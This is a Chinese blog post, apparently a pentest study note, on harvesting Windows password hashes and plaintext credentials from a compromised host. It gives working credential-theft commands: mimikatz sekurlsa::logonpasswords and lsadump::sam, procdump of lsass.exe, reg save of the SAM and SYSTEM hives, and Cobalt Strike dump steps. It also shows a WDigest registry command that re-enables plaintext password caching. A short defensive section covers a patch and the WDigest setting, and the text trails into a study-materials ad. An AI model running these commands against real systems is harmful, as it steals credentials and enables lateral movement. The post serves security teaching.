【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】(1)

于 2024-05-13 10:55:20 发布
阅读量656 收藏 9
点赞数 12
分类专栏: 程序员 文章标签: 笔记 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969642/article/details/138793213
版权

在获取到目标主机权限后,我们可以抓取hashdump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。

  1. 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)]
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-031ne9xG-1627176965165)(images/2021-07-20-16-12-28.png)]
  2. 利用mimikatz抓取明文密码:右键被控主机 —> Access —> Run Mimikatz
    在这里插入图片描述
    在这里插入图片描述
    导出的信息可以点击View -> Credentials查看获取到的凭证信息。
    在这里插入图片描述
2.通过工具获取凭证信息
  1. mimikatz
    (1)读取本地SAM文件,导出HASH。
    在命令行环境中打卡mimikatz,输入privilege::debug提权,然后输入token::elevate将权限提升到System,最后输入lsadump::sam,读取本地SAM文件,获得NTML Hash。
    在这里插入图片描述
    (2)在线读取SAM文件,导出文明密码。
    进入mimikatz后依次输入命令:
    privilege::debug
    log
    sekurlsa::logonpasswords
    在这里插入图片描述
    (3)离线读取lsass.dmp文件。
    首先使用微软官方工具Procdump导出lasss.dmp文件,命令(需要管理员和权限):
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    在这里插入图片描述
    然后再使用mimikatz离线读取lsass.dmp文件,打开mimikatz后输入
    首先加载lsass.dmp:
    sekurlsa::minidump lsass.dmp
    在这里插入图片描述
    读取散列值:
    sekurlsa::logonPasswords full
    在这里插入图片描述
  2. GetPass
    直接运行程序:
    在这里插入图片描述
  3. PwDump7
    PwDump7可以得到系统中所有账户的NTLM Hash。可以通过彩虹表来破解散列值。如果无法通过彩虹表来破解,可以使用哈希传递的方法进行横向渗透测试。
    直接运行程序:
    在这里插入图片描述
  4. QuarksPwDump
    命令:QuarksPwDump.exe --dump-hash-local
    在这里插入图片描述
3.通过SAM和System文件抓取密码。
  1. 导出SAM和System文件。
    命令:
    shell reg save hklm\sam sam.hive
    shell reg save hklm\system system.hive
    在这里插入图片描述
  2. 通过mimikatz读取SAM和System文件。
    首先需要将目标系统导出的system.hive和sam.hive文件放到与mimikatz工具同一目录下,输入如下命令获得NTML Hash:
    lsadump::sam /sam:sam.hive /system:system.hive
    在这里插入图片描述

明文密码或散列值抓取防范方法

微软为了防止用户密码在内存中以明文形式泄露,发布了补丁KB2871997,关闭了Wdigest功能。
Windows Server 2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server 2012以下版本,如果安装了KB2871997,攻击者同样无法获取明文密码。

在日常网络维护中,通过查看注册表项Wdigest,可以判断Wdigest 功能的状态。如果该项的值为1,用户下次登录时,攻击者就能使用工具获取明文密码。应该确保该项的值为0,使用户明文密码不会出现在内存中。

1. 安装KB2871997补丁
2. 使用命令管理Wdigest Auth

在命令行环境中开启或关闭Wdigest Auth,有如下两种方法。

  1. 使用reg add 命令

开启Wdigest Auth,命令如下:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

关闭Wdigest Auth,命令如下:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
  1. 使用Powershell

开启Wdigest Auth,命令如下:

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84969642
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试笔记】之【内网渗透——Windows系统散列获取防范
AA8j的博客
07-26 490
拓扑图 Windows系统散列获取防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列的若干方法和防御手段】
AA8j的博客
11-14 3041
文章目录1. Hash结构2. 获取方法2.1 mimikatz2.1.1 在线读取散列和明文密码2.1.2 在线读取SAM文件获取散列2.1.3 离线读取lsass.dmp 文件获取明文与散列1. 导出lsass.dmp 文件2. 读取lsass.dmp 文件2.1.4 离线读取SAM和system文件获取散列1. 导出2. 读取2.1.5 使用PowerShell版mimikatz获取明文密码与散列2.2 GetPassword(获得明文密码及散列)2.3 PwDump7(获得散列
Windows系统散列获取
weixin_43047908的博客
05-16 1323
目录Windows认证机制单机密码抓取SAM(安全账户管理器)lsass.exe Windows认证机制 Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。 在windows中,密码通常由LM Hash和NTLM Hash组成,结构: username:RID:LM-HASH:NT-HASH LM Hash:使用 DES加密 ,用户密码设置14位以上,即为停用LM Hash。 NTL
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 951
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
破解Windows本地账户密码(拿到明文密码)
zhangkexin3的博客
01-26 803
破解Windows本地账户密码
渗透测试入门——渗透测试笔记
01-27
本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,这两个 CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并...
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块是Python编程中用于发送HTTP请求的重要第三方库,它为开发者提供了简洁、直观的接口,使得处理HTTP请求...无论是在Web开发、自动化测试还是渗透测试中,Requests都能极大地简化网络数据的获取和处理过程。
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
03-27
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
读书笔记之python渗透测试.docx
最新发布
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2688
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2172
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6673
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
Kali渗透测试散列密码破解
Liu_Bruce的博客
05-26 4137
Kali渗透测试散列密码破解 某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。 被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到
【内网学习笔记】26、ntds.dit 的提取与散列导出
TeamsSix 的 CSDN 空间
09-09 1378
0、前言 在活动目录中,所有数据都保存在 ntds.dit 文件中,ntds.dit 是一个二进制文件,存储位置为域控的 %SystemRoot%\ntds.dit ntds.dit 中包含(但不限于)用户名、散列、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取到域内所有用户的 hash 在通常情况下,即使拥有管理员权限,也无法读取域控中的 ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
Windows获取密码及hash
LuckySec
05-04 3382
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash ,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
mimikatz+ProcDump离线读取win2008及以下用户密码
q996966912的博客
09-01 714
win2008读取普通用户密码
获取windows hash的几种方式
lansefly1990的专栏
02-26 6556
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash 该hash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
Joas Antonio的OSED笔记概述:渗透测试Windows安全技术
本文档"OSED Notes Study Overview by Joas Antonio"主要聚焦于网络安全渗透测试中的关键概念和技术,由LinkedIn的专业人士Joas Antonio dos Santos撰写。内容涵盖了广泛的领域,从基础的实验室实践到高级的逆向工程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值